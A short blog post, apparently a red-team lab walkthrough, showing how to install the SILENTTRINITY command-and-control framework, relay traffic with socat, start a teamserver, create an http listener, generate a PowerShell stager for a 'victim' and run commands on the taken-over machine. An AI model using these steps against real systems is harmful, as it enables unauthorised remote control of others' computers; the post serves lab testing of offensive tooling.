Now we are gonna look at SILENTTRINITY from @byt3bl33d3r I think this will be the last test of Command and Controll application. I have other stuff to do. But I hope you all had a good read and set some things in motions for you.
Here is the link that you can read and download the SILENTTRINTY https://github.com/byt3bl33d3r/SILENTTRINITY
A picture says more than 1000 words so lets start with that!
- run socat for the external access from victim to C2
- Install kali
- Install SILENTTRINITY
- Create listeners
- Create payloads
- Run payloads
- Take over the machine
Go back a few blogpost to get more information about socat.
sudo socat TCP4-LISTEN:80,fork,reuseaddr TCP:172.21.21.41:80
Lets jump in the installation of SILENTTRINITY.
Git Clone the stuff
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
Time so do som pip3. I also tried to install this on clean ubuntu 20.10, but did get some error about Pyhton crypto stuf cffi modules and so one. This worked directly on a Kali box. I did fix that with below command:
sudo apt-get install build-essential libssl-dev libffi-dev python-dev
Time to install.
pip3 install --user pipenv && pipenv install && pipenv shell
Run the server
ython3.9 st.py teamserver 172.21.21.40 password
Time to connect to the teamserver from the client
Type list to see the connecttion
Time to create a listener for our victim to connect to. Type list under listeners to see what listeners you have.
This time we use the http one with below command
Create payload or stager that is called here
Generate the stager for the listener http
use use powershell_stageless
Now take this stager.ps1 and put this on the victim in some way. Use your own imagination how to do that. www, ftp, floppy, cd or irc…
Run it on the client
Go back to the SILENTTRINTY client to interact with the victim
See active sessions and list them. The name here is important, we use that name when we run our modules.
How to use a module to a connected victim
Use the module and run it.
set Command whoami
So this was the last C2 in this round. I hope in the future I will have time to test som more C2 stuff.